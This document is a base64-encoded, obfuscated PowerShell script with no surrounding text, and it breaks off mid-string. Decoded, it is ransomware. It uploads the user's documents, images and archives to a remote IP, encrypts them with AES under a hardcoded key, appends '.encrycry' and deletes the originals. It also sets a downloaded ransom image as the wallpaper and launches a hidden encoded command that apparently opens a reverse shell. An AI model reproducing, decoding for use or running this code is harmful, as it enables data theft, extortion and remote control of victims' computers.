AgACAAIAAgACAAIABuAGAAZQBXAC0AaQBUAGUAbQBgAHAAcgBgAE8AcABFAFIAdABZACAALQBQAGEAdABoACAAKAAoACcASABLAEMAJwArACcAVQA6ADYAVwBVAEMAbwBuAHQAcgBvAGwAIABQAGEAbgBlAGwANgAnACsAJwBXAFUARAAnACsAJwBlACcAKwAnAHMAawAnACsAJwB0AG8AcAAnACkAIAAtAEMAcgBFAHAAbABBAEMAZQAnADYAVwBVACcALABbAGMASABBAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFQAaQBsAGUAVwBhAGwAbABwAGEAcABlAHIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAB7AFQAYABlAE0AUAB9ACAAPQANAAoAQAAiACAADQAKACAAIAAgACAAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAgAA0ACgAgACAAIAAgAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKACAAIAAgACAAIAAgAA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAUABhAHIAYQBtAHMADQAKACAAIAAgACAAewAgAA0ACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBzAGUAcgAzADIALgBkAGwAbAAiACwAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBVAG4AaQBjAG8AZABlACkAXQAgAA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AIAAoAEkAbgB0ADMAMgAgAHUAQQBjAHQAaQBvAG4ALAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB0ADMAMgAgAHUAUABhAHIAYQBtACwAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAcgBpAG4AZwAgAGwAcAB2AFAAYQByAGEAbQAsACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAMwAyACAAZgB1AFcAaQBuAEkAbgBpACkAOwANAAoAIAAgACAAIAB9AA0ACgAiAEAAIAANAAoAIAAgACAAIABBAGAARABkAGAALQB0AFkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHsAdABgAEUAbQBQAH0ADQAKAA0ACgAgACAAIAAgACQAewBzAHAAaQBfAHMAYABlAGAAVABkAGAARQBzAEsAVwBhAGAAbABsAFAAYQBQAEUAUgB9ACAAPQAgADAAeAAwADAAMQA0AA0ACgAgACAAIAAgACQAewB1AHAAZABgAEEAVABFAGAASQBOAEkAZgBgAGkAbABFAH0AIAA9ACAAMAB4ADAAMQANAAoAIAAgACAAIAAkAHsAcwBlAGAATgBEAGMASABhAGAATgBHAGUARQB2AGAAZQBgAE4AVAB9ACAAPQAgADAAeAAwADIADQAKACAAIAAgACAADQAKACAAIAAgACAAJAB7AGYAdwBgAGkATgBJAGAATgBJAH0AIAA9ACAAJAB7AFUAUABkAGEAYABUAEUAaQBgAE4AYABJAGYASQBsAGUAfQAgAC0AYgBvAHIAIAAkAHsAcwBlAGAATgBEAEMAYABIAEEATgBnAGUAZQB2AGAAZQBgAE4AdAB9AA0ACgAgACAAIAAgAA0ACgAgACAAIAAgACQAewByAGAARQBUAH0AIAA9ACAAWwBQAGEAcgBhAG0AcwBdADoAOgBTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AKAAkAHsAcwBwAGAAaQBfAHMAZQBgAFQAYABkAGAAZQBTAGsAdwBhAEwATABgAHAAYQBwAGAARQByAH0ALAAgADAALAAgACQAewBpAG0AQQBgAGcAZQB9ACwAIAAkAHsARgBXAGAAaQBgAE4AaQBOAGkAfQApAA0ACgB9AA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgB2AG8AawBlAC0ARQBuAGMAcgB5AGMAcgB5ACAAewANAAoAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ADQAKACAAIAAgACAAWwBPAHUAdABwAHUAdABUAHkAcABlACgAWwBzAHQAcgBpAG4AZwBdACkAXQANAAoAIAAgACAAIABQAGEAcgBhAG0ADQAKACAAIAAgACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAgAD0AIAAkAHsAdABSAGAAVQBFAH0AKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBrAGAARQB5AH0ALAANAAoADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAIAA9ACAAJAB7AFQAUgBgAFUARQB9ACwAIABQAGEAcgBhAG0AZQB0AGUAcgBTAGUAdABOAGEAbQBlACAAPQAgACIAYwBSAFkAcABgAFQAZgBJAGAATABlACIAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBQAGAAQQBUAEgAfQANAAoAIAAgACAAIAApADsADQAKAA0ACgAgACAAIAAgAEIAZQBnAGkAbgAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAcwBgAGgAYABBAGAAbQBBAG4AYQBHAEUARAB9ACAAPQAgAG4ARQBXAC0AbwBgAEIAagBgAGUAQwBUACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFMASABBADIANQA2AE0AYQBuAGEAZwBlAGQAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAEUAUwBgAE0AQQBuAEEARwBgAEUARAB9ACAAPQAgAG4AZQBXAGAALQBvAGAAQgBKAEUAQwBUACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAEUAcwBNAEEAbgBgAEEAZwBgAGUAZAB9AC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAYQBFAFMAbQBBAG4AYQBgAEcAYABlAEQAfQAuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFoAZQByAG8AcwA7AA0ACgAgACAAIAAgACAAIAAgACAAJAB7AEEAZQBgAHMAbQBgAEEAYABOAGEAZwBFAGQAfQAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4ADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAQQBFAFMAYABNAEEAYABOAEEARwBlAEQAfQAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwANAAoAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAGUAcwBgAE0AQQBOAGAAQQBHAGAAZQBEAH0ALgBLAGUAeQAgAD0AIAAkAHsAcwBoAGEATQBgAEEAbgBgAEEAYABHAEUARAB9AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAewBrAGAAZQBZAH0AKQApADsADQAKACAAIAAgACAAIAAgACAAIAB0AHIAeQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAewBmAGAAaQBMAGUAfQAgAD0AIABnAEUAdAAtAGAASQBgAFQARQBNACAALQBQAGEAdABoACAAJAB7AHAAYQBgAFQAaAB9ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAUABMAGEAaQBgAE4AQgBgAHkAYABUAGUAUwB9ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJAB7AEYASQBgAGwAZQB9AC4ARgB1AGwAbABOAGEAbQBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AG8AdQBgAFQAUABgAEEAVABoAH0AIAA9ACAAJAB7AGYASQBgAEwAZQB9AC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACgAJwAuAGUAJwArACcAbgBjAHIAeQBjAHIAeQAnACkAOwANAAoAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AGUAbgBjAHIAYAB5AFAAdABgAG8AcgB9ACAAPQAgACQAewBBAEUAcwBgAE0AQQBuAEEAYABHAEUAZAB9AC4AQwByAGUAYQB0AGUARQBuAGMAcgB5AHAAdABvAHIAKAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAewBlAG4AYABjAFIAWQBwAFQARQBgAGQAQgBgAFkAVABlAFMAfQAgAD0AIAAkAHsAZQBuAEMAcgB5AGAAcABgAFQAbwByAH0ALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJAB7AFAAYABsAEEASQBOAGIAYAB5AFQAZQBzAH0ALAAgADAALAAgACQAewBQAGAAbABgAEEAaQBuAGIAWQB0AEUAUwB9AC4ATABlAG4AZwB0AGgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAZQBOAGAAQwBgAFIAWQBgAFAAdABlAGAARABCAHkAdABFAHMAfQAgAD0AIAAkAHsAQQBFAHMAbQBhAG4AYABBAGAARwBgAGUARAB9AC4ASQBWACAAKwAgACQAewBFAGAATgBDAFIAYABZAFAAdABlAGQAYABCAFkAdABlAHMAfQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAYQBlAGAAUwBgAG0AQQBOAGAAQQBHAEUARAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAewBvAFUAVABgAFAAYQBgAFQASAB9ACwAIAAkAHsAZQBuAGAAQwBSAFkAUABUAGUAZABCAGAAeQBUAEUAcwB9ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKABnAGAARQBgAFQALQBJAHQARQBtACAAJAB7AG8AVQB0AGAAcABhAHQAaAB9ACkALgBMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAAPQAgACQAewBGAGkAYABsAGUAfQAuAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoACcARgAnACsAJwBpAGwAZQAgACcAKwAnAGUAJwArACcAbgBjACcAKwAnAHIAeQBwAHQAZQBkACcAKwAnACAAJwArACcAdABvACcAKwAnACAAJwArACIAJABvAHUAdABQAGEAdABoACIAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAfQAgAEMAYQB0AGMAaAAgAHsAIAB9AA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAA0ACgAgACAAIAAgAEUAbgBkACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAewBTAEgAQQBgAG0AYQBuAGEAZwBgAEUAZAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBBAGAARQBzAE0AYQBOAGAAQQBnAEUARAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJAB7AGQAbwBgAFcAbgBgAEwAbwBhAGAARABVAHIATAB9ACAAPQAgACgAJwBoACcAKwAnAHQAdAAnACsAJwBwADoALwAvADEANgAnACsAJwA4AC4AMQAnACsAJwA4ACcAKwAnADgALgAxADIANwAnACsAJwAuADIAJwArACcAMQA3ACcAKwAnAC8AbgBvACcAKwAnAHQAaQBjAGUALgBwAG4AZwAnACkADQAKACQAewBQAEEAYABUAGgAfQAgAD0AIAAoACQAewBFAE4AdgA6AGAAVABlAGAATQBwAH0AKQAgACsAIAAoACgAJwAzAEQAQgBuAG8AJwArACcAdABpAGMAZQAuACcAKwAnAHAAJwArACcAbgBnACcAKQAuAHIARQBQAEwAYQBDAGUAKAAoAFsAYwBIAEEAUgBdADUAMQArAFsAYwBIAEEAUgBdADYAOAArAFsAYwBIAEEAUgBdADYANgApACwAWwBTAFQAUgBpAG4ARwBdAFsAYwBIAEEAUgBdADkAMgApACkADQAKACgAbgBlAFcALQBvAGAAQgBqAEUAYABDAFQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB7AEQATwBXAGAATgBMAG8AQQBkAGAAVQByAEwAfQAsACAAJAB7AFAAQQBgAFQAaAB9ACkADQAKAA0ACgBTAEUAVABgAC0AdwBhAGAAbABgAEwAUABBAHAAYABlAFIAIAAtAEkAbQBhAGcAZQAgACQAZQBuAHYAOgBUAEUATQBQACIAXABuAG8AdABpAGMAZQAuAHAAbgBnACIAIAAtAFMAdAB5AGwAZQAgAEYAaQB0AA0ACgANAAoAdwBoAGkAbABlACgAMQApACAAewANAAoAIAAgACAAIAAkAHsAQQB9ACAAPQAgAEcAZQBUAC0AYwBoAGkAbABgAGQAYABpAGAAVABlAE0AIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAC8AKgAgAC0ASQBuAGMAbAB1AGQAZQAgACoALgBwAG4AZwAsACAAKgAuAGcAaQBmACwAIAAqAC4AagBwAGcALAAgACoALgBqAHAAZQBnACwAIAAqAC4AYQBpACwAIAAqAC4AcABzAGQALAAgACoALgBjAHMAdgAsACAAKgAuAHgAbABzAHgALAAgACoALgBwAHAAdAB4ACwAIAAqAC4AcABkAGYALAAgACoALgBoAHcAcAAsACAAKgAuAGgAdwBwAHgALAAgACoALgB0AHgAdAAsACAAKgAuAGIAYQB0ACwAIAAqAC4AbABuAGsALAAgACoALgB6AGkAcAAsACAAKgAuADcAegAsACAAKgAuAHIAYQByACwAIAAqAC4AdAB4AHQAIAAtAFIAZQBjAHUAcgBzAGUAOwANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHsAQgB9ACAAaQBuACAAJAB7AEEAfQApACAAewANAAoAIAAgACAAIAAgACAAIAAgAFQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AFcAYwB9ACAAPQAgAE4AZQBgAFcALQBvAGAAQgBKAGAARQBDAFQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AHIAYABlAFMAfQAgAD0AIAAkAHsAVwBDAH0ALgBVAHAAbABvAGEAZABGAGkAbABlACgAKAAnAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AMwA0ACcAKwAnAC4ANgAnACsAJwA0AC4AJwArACcAMQA0ADMALgAzADQAOgAnACsAJwAzADAAMAAwACcAKQAsACAAJAB7AEIAfQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAYABOAGAAVgBgAE8ASwBlAGAALQBFAG4AYwByAHkAYwBSAHkAIAAtAEsAZQB5ACAAKAAnADkANgA0ADEARQA0ACcAKwAnADQAJwArACcAMAAzADUAQwAwADgAQQAxADQAJwArACcAMgAyACcAKwAnADYAOABGAEIAJwArACcARQA1AEEAQgAzADMARAAwAEQARgAnACkAIAAtAFAAYQB0AGgAIAAkAHsAQgB9ADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIARQBNAG8AVgBgAEUALQBJAGAAVABlAE0AIAAkAHsAYgB9ADsADQAKACAAIAAgACAAIAAgACAAIAB9ACAAQwBhAHQAYwBoACAAewAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABTAFQAYQBgAFIAVABgAC0AUABgAFIAbwBjAEUAcwBzACAAJABQAFMASABPAE0ARQBcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAoACcALQAnACsAJwBOAG8ARQB4AGkAdAAnACkALAAoACcALQB3AGkAbgBkAG8AJwArACcAdwBzAHQAeQBsAGUAJwArACcAIABoAGkAJwArACcAZAAnACsAJwBkACcAKwAnAGUAbgAnACkALAAoACcALQBFAG4AYwAgAEoAQQBCADAAQQBDACcAKwAnAEEAQQBQAFEAQQBnAEEAQwBjAEEAVwB3AEIARQBBAEcAdwBBAGIAQQBCAEoAQQBHADAAQQBjAEEAQgB2AEEASABJACcAKwAnAEEAZABBAEEAbwBBAEMASQBBAGQAUQBCAHoAJwArACcAQQBHAFUAQQBjAGcAQQB6AEEARABJAEEATABnAEIAawBBAEcAdwBBAGIAQQBBAGkAQQBDAGsAQQBYAFEAQQBnAEEASABBAEEAZABRAEIAaQBBAEcAdwBBAGEAUQBCAGoAQQBDAEEAQQBjAHcAQgAwAEEARwBFAEEAZABBAEIAcABBAEcATQBBAEkAQQBCAGwAQQBIAGcAQQBkAEEAQgBsAEEASABJAEEAYgAnACsAJwBnAEEAZwBBAEcASQBBAGIAdwBCAHYAQQBHAHcAQQBJAEEAQgBUAEEARwBnAEEAYgB3AEIAMwBBAEYAYwBBAGEAUQBCAHUAQQBHAFEAQQBiAHcAQgAzAEEAQwBnAEEAYQBRAEIAdQBBAEgAUQBBAEkAQQBCAG8AQQBHACcAKwAnAEUAQQBiAGcAQgBrAEEARwAnACsAJwB3AEEAWgBRAEEAcwBBAEMAQQBBAGEAUQBCAHUAQQBIAFEAQQBJAEEAQgB6AEEASABRAEEAWQBRAEIAMABBAEcAVQBBAEsAUQBBADcAJwArACcAQQBDAGMAQQBEAFEAQQBLAEEARwBFAEEAWgBBAEIAawBBAEMAMABBAGQAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAYgBnAEIAaABBAEcAMAAnACsAJwBBAFoAUQBBAGcAQQBIAGMAQQBhAFEAQgB1AEEAQwBBAEEATABRAEIAdABBAEcAVQBBAGIAUQBCAGkAQQBHAFUAQQBjAGcAQQBnAEEAQwBRAEEAZABBAEEAZwBBAEMAMABBAGIAZwBCAGgAQQBHADAAQQBaAFEAQgB6AEEASABBAEEAJwArACcAWQBRAEIAagBBAEcAVQBBAEkAQQAnACsAJwBCAHUAQQBHAEUAQQBkAEEAQgBwAEEASABZAEEAWgBRAEEATgBBAEEAbwBBAFcAdwBCAHUAQQBHAEUAQQBkAEEAQgBwAEEASABZAEEAWgBRAEEAdQBBAEgAYwBBAGEAUQBCAHUAQQBGADAAQQAnACsAJwBPAGcAQQA2AEEARgBNAEEAYQBBAEIAdgBBAEgAYwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEASwBBAEEAbwBBAEYAcwBBAFUAdwBCADUAQQBIAE0AQQBkAEEAQgBsAEEARwAwAEEATABnAEIARQBBAEcAawBBAFkAUQBCAG4AQQAnACsAJwBHADQAQQBiAHcAQgB6AEEASABRACcAKwAnAEEAYQBRAEIAagBBAEgATQBBAEwAZwBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEYAMABBAE8AZwBBADYAQQBFAGMAQQBaAFEAQgAwAEEARQBNAEEAZABRAEIAeQBBAEgASQBBAFoAUQBCAHUAQQBIAFEAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBBAG8AQQBDAGsAQQBJAEEAQgA4AEEAQwBBAEEAUgB3AEIAbABBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAawBBAEwAZwBCAE4AQQBHAEUAJwArACcAQQBhAFEAQgB1AEEARgBjAEEAYQBRAEIAdQBBAEcAUQBBAGIAdwAnACsAJwBCADMAQQBFAGcAQQBZAFEAQgB1AEEARwBRAEEAYgBBAEIAbABBAEMAdwBBAEkAQQBBAHcAQQBDAGsAQQBEAFEAQQBLAEEAQQAwAEEAQwBnAEEAawBBAEcATQBBAGIAQQBCAHAAQQBHAFUAQQBiAGcAQgAnACsAJwAwAEEAQwBBAEEAUABRAEEAZwBBAEUANABBAFoAUQBCADMAQQAnACsAJwBDADAAQQAnACsAJwBUAHcAQgBpAEEARwBvAEEAWgBRAEIAagBBAEgAUQBBAEkAJwArACcAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUANABBAFoAUQBCADAAQQBDADQAQQBVAHcAQgB2AEEARwBNAEEAYQB3AEIAJwArACcAbABBAEgAUQBBAGMAdwBBAHUAQQBGAFEAQQBRAHcAQgAnACsAJwBRAEEARQBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDAGcAQQAnACsAJwBJAGcAQQB6AEEARABRAEEATABnAEEAeABBACcAKwAnAEQASQBBAE0AdwBBAHUAQQBEAEUAQQBOACcAKwAnAGcAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAawBBAEkAZwBBAHMAQQBDAEEAQQBPAEEAQQB3AEEAQwBrAEEATwB3AEEATgBBAEEAbwBBAEoAJwArACcAQQBCAHoAJwArACcAQQAnACsAJwBIAFEAQQBjAGcAQgBsAEEARwBFAEEAYgBRAEEAZwBBAEQAMABBAEkAQQBBAGsAQQBHAE0AQQBiAEEAQgBwAEEARwBVAEEAYgBnAEIAMABBAEMANABBAFIAdwBCAGwAQQBIAFEAQQBVAHcAQgAwAEEASABJAEEAWgBRAEIAaABBAEcAMABBAEsAQQBBAHAAQQBEAHMAQQBEAFEAQQBLAEEAQQAwAEEAJwArACcAQwBnAEIAYgBBAEcASQBBAGUAUQBCADAAQQBHAFUAQQBXAHcAQgBkAEEARgAwAEEASgBBACcAKwAnAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBIAE0AQQBJACcAKwAnAEEAQQA5AEEAJwArACcAQwBBAEEATQBBAEEAdQAnACsAJwBBAEMANABBAE4AZwBBADEAQQBEAFUAQQBNAHcAQQAxAEEASAB3AEEASgBRAEIANwBBAEQAQQBBAGYAUQBBADcAQQBBADAAQQBDAGcAQgAzAEEARwBnAEEAYQBRAEIAcwBBAEcAVQBBAEsAQQBBAG8AQQBDAFEAQQBhAFEAQQBnAEEARAAwAEEASQBBAEEAawBBAEgATQBBAGQAQQBCAHkAQQBHAFUAQQBZAFEAQgB0AEEAQwA0AEEAVQBnAEIAbABBAEcARQBBAFoAQQBBAG8AQQBDAFEAQQAnACsAJwBZAGcAQgA1AEEASABRAEEAWgBRAEIAegBBAEMAdwAnACsAJwBBAEkAQQBBAHcAQQBDAHcAQQBJAEEAQQBrAEEARwBJAEEAZQBRAEIAMABBAEcAVQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAawBBAEsAUQBBAGcAQQBDADAAQQBiAGcAQgBsAEEAQwBBAEEAJwArACcATQBBAEEAcABBAEMAQQBBAGUAdwBBAE4AQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAawBBAEcAUQBBAFkAUQBCADAAQQBHAEUAQQBJAEEAQQA5AEEAQwBBAEEASwBBAEIATwBBAEcAVQBBAGQAdwAnACsAJwBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAEwAUQBCAFUAQQBIAGsAQQBjAEEAQgBsAEEARQA0AEEAWQBRAEIAdABBAEcAVQBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYAUQBBAFoAUQBCADQAQQBIAFEAQQBMAGcAQgBCAEEARgBNAEEAUQAnACsAJwB3AEIASgBBAEUAawBBAFIAUQBCACcAKwAnAHUAQQBHAE0AQQBiAHcAQgBrAEEARwBrAEEAYgBnAEIAbgBBAEMAawBBAEwAZwBCAEgAQQBHAFUAQQBkAEEAQgBUAEEASABRAEEAYwBnAEIAcABBAEcANAAnACsAJwBBAFoAdwBBAG8AQQBDAFEAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAegBBAEMAdwBBAE0AQQBBACcAKwAnAHMAQQBDAEEAQQBKAEEAQgBwAEEAQwBrAEEATwB3AEEATgBBAEEAbwBBACcAKwAnAEkAQQBBAGcAQQBDAEEAQQBJAEEAQQBrAEEASABNAEEAWgBRAEIAdQBBAEcAUQBBAFkAZwBCAGgAQQBHAE0AQQBhAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEcAawBBAFoAUQBCADQAQQBDAEEAQQBKAEEAQgAnACsAJwBrAEEARwBFAEEAZABBAEIAaABBAEMAQQBBAE0AZwBBACsAQQBDAFkAQQBNAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQAnACsAJwBBAGQAQQBBAHQAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEMAQQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEMAUQBBAGMAdwBCAGwAJwArACcAQQBHADQAQQBaAEEAQgBpAEEARwBFAEEAWQB3AEIAcgBBAEQASQBBAEkAQQBBADkAQQBDAEEAQQBKAEEAQgB6AEEARwBVAEEAYgBnAEIAawBBAEcASQBBAFkAUQBCAGoAQQAnACsAJwBHAHMAQQBJAEEAQQByAEEAQwBBAEEASQBnAEIAUQBBAEYATQBBAEkAQQBBAGkAQQBDAEEAQQAnACsAJwBLAHcAQQBnAEEAQwBnAEEAYwBBAEIAMwBBAEcAUQBBAEsAUQBBAHUAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAcgBBAEMAQQBBAEkAZwBBACsAQQBDAEEAJwArACcAQQBJAGcAQQA3AEEAQQAwAEEAQwBnAEEAZwBBAEMAQQBBAEkAQQBBAGcAQQBDAFEAQQBjAHcAQgBsAEEARwA0AEEAWgBBAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBDAEEAQQBQAFEAQQBnAEEAQwBnAEEAVwB3AEIAMABBAEcAVQBBAGUAQQBCADAAQQBDADQAQQBaAFEAQgB1AEEARwBNAEEAYgB3AEIAawBBAEcAawBBAGIAZwBCAG4AQQBGADAAQQBPAGcAQQAnACsAJwA2ACcAKwAnAEEARQBFACcAKwAnAEEAVQB3AEIARAAnACsAJwBBAEUAawBBAFMAUQBBAHAAJwArACcAQQBDADQAJwArACcAQQBSAHcAJwArACcAQgBsAEEASABRAEEAUQBnAEIANQBBAEgAUQBBAFoAUQBCAHoAQQBDAGcAQQAnACsAJwBKAEEAQgB6AEEARwBVAEEAYgBnAEIAawAnACsAJwBBAEcASQBBAFkAUQBCAGoAQQAnACsAJwBHAHMAQQBNAGcAQQBwAEEARABzAEEARABRAEEASwBBAEMAQQBBAEkAQQBBAGcAQQBDAEEAQQBKACcAKwAnAEEAQgB6AEEASABRAEEAYwBnAEIAbABBAEcARQBBAGIAUQAnACsAJwBBAHUAQQBGAGMAQQBjAGcAQgBwAEEASABRAEEAWgBRAEEAbwBBAEMAUQBBAGMAdwBCAGwAQQBHADQAQQBaAEEAQgBpAEEASABrAEEAJwArACcAZABBAEIAbABBAEMAdwBBAE0AQQBBAHMAQQBDAFEAQQBjAHcAQgBsAEEARwA0AEEAWgBBAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBDADQAJwArACcAQQBUAEEAQgBsAEEARwA0AEEAWgB3AEIAMABBAEcAZwBBAEsAUQBBADcAQQBBADAAQQBDAGcAQQBnAEEAQwBBAEEASQBBA